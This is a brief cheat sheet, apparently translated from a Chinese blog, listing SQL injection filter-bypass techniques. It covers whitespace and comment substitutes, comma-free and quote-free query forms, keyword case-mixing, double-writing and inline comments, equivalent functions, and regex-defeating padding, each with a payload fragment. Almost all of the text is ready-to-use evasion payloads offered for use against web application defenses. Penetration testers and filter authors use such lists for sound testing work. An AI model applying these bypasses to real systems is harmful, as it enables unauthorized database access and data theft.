Common bypass techniques
1. Whitespace bypass
Format: %20 %09 %0b %0c %0d %00 /**/ /*!*/ +
e.g.: '0'+'0'
select * from user where name=admin union/**/select ...
2. Parenthesis () bypass
Format: ()
e.g.: select (user());
select (database());
select (user()) from (tables) where (1=1) and (2=2);
3. Comma filtering
Format 1: from 1 for 1
substr(database(),1,1) ===== select substr(database() from 1 for 1)
Format 2: join
union select 1,2 ====== union select * from (select 1)a join (select 2)b;
4. or, and, xor, not
Format: and  &&
        or   ||
        xor  |
        not  !
5. Comment bypass
Format: # %123 -- - --+ --
or '1'='1' and '1'='1' // closing the expression with a logical operator
6. Quote bypass
table_schema='security' ===== table_schema=0x73656375727479 // 'security' converted to hexadecimal (0x)
7. Keyword bypass
union ======= uNion // case-variation bypass
union ======= /*!union*/ select ... // inline comment
union ======= ununionion // double-writing, survives a filter that deletes the keyword once
or 1=1 ====== url, ascii, hex, unicode // encoding bypass
// equivalent functions
hex(), bin() ==== ascii()
sleep() ==== benchmark()
concat_ws() ==== group_concat()
@@user ==== user()
@@datadir ==== datadir()
8. Regex bypass
union /* '+ 'a' *100000+' */ select // Python-style 'a'*100000 stands for a comment padded to 100,000 characters
Source: https://www.cnblogs.com/cshut/p/16859147.html